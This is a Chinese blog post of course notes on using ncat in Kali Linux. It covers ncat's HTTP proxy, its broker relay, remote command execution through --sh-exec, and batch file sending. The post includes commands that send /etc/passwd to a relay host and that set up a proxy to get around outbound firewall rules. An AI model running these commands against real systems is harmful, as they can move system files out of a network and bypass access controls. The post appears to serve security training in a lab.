Kali Linux渗透测试 118 DNS 协议隧道--NCAT

最新推荐文章于 2023-08-01 16:15:00 发布
最新推荐文章于 2023-08-01 16:15:00 发布
阅读量765 收藏
点赞数 1
分类专栏: kali-linux 文章标签: kali-linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kevinhanser/article/details/79857590
版权

本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程

Kali Linux渗透测试(苑房弘)博客记录

1. 简介

  • 被称为众多 NC 衍生版中最优的选择

  • 代理功能

    • 默认侦听端口:31337
    • ncat -l 8080 --proxy-type http --proxy-auth user:pass

  • broker 中介功能

    • AB 不同但AC、BC互通
    • 服务器:ncat -l 333 --broker
    • 客户端之间发送任何信息都会被 hub 到其他客户端
    • 批量执行命令:ncat 1.1.1.1 --sh-exec “echo ‘pwd’”
    • 批量传文件:ncat --send-only 1.1.1.1 < inputfile

2. 测试代理功能

  • kali 运行命令

      root@kali:~# ncat -l 8080 --proxy-type http --proxy-auth user:pass123

    在这里插入图片描述

      如果防火墙未限制 22 端口的出站访问,那么可以在公网放一台 linux 机器,装上nmap(自带ncat),侦听22端口,可以代理内网机器访问外网资源
  ncat -l 22 --proxy-type http --proxy-auth user:pass123

3. 测试 broker 中介功能

  • 机器1(作为服务端)

      root@kali:~# ncat -l 333 --broker

  • 机器2(客户端1)

      root@kali:~# ncat 192.168.1.14 333

  • 机器3 (客户端2)

      root@lamp:~# ncat 192.168.1.14 333

  • 在客户端1 上说话

    在这里插入图片描述

  • 在客户端2 上可以看见

    在这里插入图片描述

4. 利用 broker 执行命令

  • 机器1(作为服务端)

      root@kali:~# ncat -l 333 --broker

  • 机器2(客户端1)

      root@kali:~# ncat 192.168.1.14 333

  • 机器3(客户端2)

      root@lamp:~# ncat 192.168.1.14 333 --sh-exec "echo `pwd`"

  • 在客户端2上 执行完命令之后

    在这里插入图片描述

  • 在客户端1 上可以看到执行结果

    在这里插入图片描述

5. 应用场景

  • 客户端1 位于内网

  • 客户端2 位于外网

  • 客户端1 无法访问 客户端2 (被防火墙隔离)

  • 服务端1 位于 客户端 1 和 2 之间,可以同时连接客户端1 和 2

  • 就可以用服务端1 作为中介跳转

  • 客户端2 可以同时存在多个

  • 客户端1 执行完命令之后,可以将结果同时发送给许多 “客户端2”

  • 除了发送命令,也可以传送文件。(都可以批量)

6. 发送文件

  • 机器1(作为服务端)

      root@kali:~# ncat -l 333 --broker

  • 机器2(客户端1)

      root@kali:~# ncat 192.168.1.14 333

  • 机器3(客户端2)

      root@lamp:~# ncat --send-only 192.168.1.14 333 < /etc/passwd

  • 在客户端2上 执行完命令之后,在客户端1 上查看结果

    在这里插入图片描述

网络安全打工人
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
dns2tcp 官方最新版 + 可用的客户端(DNS隧道转发TCP连接的工具)rar
09-24
dns2tcp 官方最新版 + 可用的客户端(DNS隧道转发TCP连接的工具)。 dns2tcp 是一个利用DNS隧道转发TCP连接的工具,使用C语言开发。它分为两个部分,服务端和客户端,服务端运行在linux服务器上,客户端可以运行在linux和windows上(其他平台没有测试过),编译完成后在服务端上的可执行文件名称为dns2tcpd,在客户端(linux)上的名称为dns2tcpc,kali默认安装了二者
Kali Linux渗透测试 117 DNS 协议隧道--iodine
kevinhanser
04-08 1262
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 Kali Linux渗透测试(苑房弘)博客记录 1. 简介 基于 DNS 查询的隧道工具 与同类工具相比的优点对下行数据不进行编码,因此性能优 支持多平台:Linux、BSD、Mac OS、Windows 最大16个并发链接 支持同网段隧道IP(不同于服务
DNS协议隧道(1)
分享学习网络的点点滴滴
09-29 635
windows 2008:安装DNS服务,配置转发器,创建区域lab.com;指派二级域test.lab.com,NS记录指向kali防火墙:只允许出站UDP 53端口流量Ubuntu:安装dns2tcp、wireshark、firefox。
DNS协议隧道DNS协议隧道-dns2tcp
chenmaoyin1482的博客
08-24 539
DNS协议隧道 防火墙禁止TCP出站访问流量 - SSH隧道、端口准发全部失效 -使用基于UPD协议隧道 ...
Kali Linux渗透测试 116 DNS 协议隧道--dns2tcp
kevinhanser
04-08 1731
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 Kali Linux渗透测试(苑房弘)博客记录 1. 简介 防火墙禁止 TCP 出战访问流量SSH 隧道、端口转发全部失效 使用基于UDP协议隧道 DNS 的工作原理适合用于实现隧道 DNS TCP 53 端口主要用于 DNS 服务器之间进行数据同步(区
Kali Linux渗透测试技术详解
最新发布
02-19
Kali Linux渗透测试技术详解本书由浅入深地介绍了Kali Linux的各种渗透测试技术。书中选取了最核心和最基础的内容进行讲解,让读者能够掌握渗透测试的流程,而不会被高难度的内容所淹没。本书涉及面广,从基本的知识...
kali-linux-2021.3-installer-amd64.part4.rar
09-29
Kali Linux预装了许多渗透测试软件,包括nmap 、Wireshark 、John the Ripper,以及Aircrack-ng.[2] 用户可过硬盘、live CD或live USB运行Kali LinuxKali Linux既有32位和64位的镜像。可用于x86 指令集。同时...
kali-linux-2023.3-vmware-amd64.part3.rar
10-13
kali-linux-2023.3(kali-linux-2023.3-vmware-amd64.7z)适用于VMware系统,文件使用WinRAR分割成四个压缩包,必须一起下载使用: 文件1:https://download.csdn.net/download/weixin_43800734/88423344 文件2:...
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part1.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part3.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
netcat安装.docx
10-25
netcat0.7.1安装部署文档.。
渗透测试工具学习笔记(2)——netcat(ncat
qq_39700392的博客
05-22 362
nc的缺点: nc缺乏加密和身份验证的能力 ncat包含于nmap工具包中 --allow 允许连接的IP地址 A: ncat -c bash --allow 192.168.20.14 -vnl 333 --ssl(用ssl加密) B: ncat -nv 1.1.1.1 333 --ssl 注:不同系统/平台的nc参数功能不尽相同 ...
DNS隧道的搭建
xiaoxuetu_的博客
07-21 1178
kali 服务器(192.168.153.144)、kali客户端(192.168.153.145)、DNS服务器(192.168.153.153) 第一步、首先配置DNS服务器 1.创建一个名为test.com的正向解析域(Foward Lookup Zones) 2.新建一个主机(New Host(A)) Name设为kaliserver。 IP地址设为192.168.153.144
内网隐藏隧道技术——DNS隧道
A_991128a的博客
08-01 1192
在实际的网络中,常会过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况,如果发现异样,就会对信进行阻断。那么什么是隧道呢?这里的隧道,就是一种绕过端口屏蔽的信方式。防火墙两端的数据包过防火墙所允许的数据包类型或端口进行封装,然后穿过防火墙,与对方进行信。当封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应服务器上。
kali linux 渗透测试 第五章 netcat--nc
quedgee
11-07 2082
继续记笔记~~~1.有了netcat,可以不用telnet了 2.nc的作用: 侦听模式 / 传输模式 telnet / 获取banner信息 传输文文本信息 传输文文件/⺫目目录 加密传输文文件 远程控制/木木⻢马 加密所有流量 流媒体服务器 远程克隆硬盘3.nc -v:显示详细的连接信息(输出内容) -n:不会进行DNS解析例如nc 隔壁服务器metasploita
基于常规DNS隧道进行的tcp端口转发dns2tcp的使用
weixin_30256505的博客
04-14 301
0x01安装Dns2TCP dns2tcp 是一个利用DNS隧道转发TCP连接的工具,使用C语言开发。 sudo apt-get install dns2tcp 0x02配置dns2tcp 配置DNS2TCP服务端 首先,将你的某个域名(这里以creke.net为例)开个二级域名a.creke.net,类型为NS,NS记录指向b.creke.ne...
Linux系统——DNS
11-25 159
DNS系统的作用1. DNS服务器Internet中,大部分网站、邮件服务等服务器都使用了域名形式的地址,这种地址形式要比使用IP地址形式更加直观,更加容易被用户记住。FQDN格式(完整域名格式):在常见域名后添加“.”(根域)。DNS系统在网络中的作用就是维护着一个地址数据库,其中记录了各种主机域名:与IP地址的对应关系,以便为客户程序提供正向或反向的地址查询服务,即正向解析与反向解...
kali linux之netcat
weixin_30426065的博客
02-16 218
网络工具中的瑞士军刀----体积小,功能强大 侦听模式/传输模式 telnet/获取banner信息 传输文本信息,文件,目录 加密传输文件,远程控制/木马,加密所有流量(来做远程控制是非常理想的选择,因为杀软不会把nc当成病毒杀掉) 可用作流媒体服务, 远程克隆硬盘,远程电子取证信息收集等 常用参数 -v 显示详细输出内容 -n 不进行dns解析 -l 监听模式 -p...
Kali linux 学习笔记(六十五)隧道——DNS隧道dns2tcp) 2020.4.9
闵行小鱼塘
04-10 1090
本节学习DNS隧道
Kali Linux渗透测试指南:从安装到开发
Kali Linux是一款基于Debian的开源操作系统,专为网络安全专业人士和渗透测试者设计。这个中文指南提供了全面的Kali Linux相关知识,包括其介绍、安装方法、一般应用、在ARM设备上的应用以及开发和社区资源。 一、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值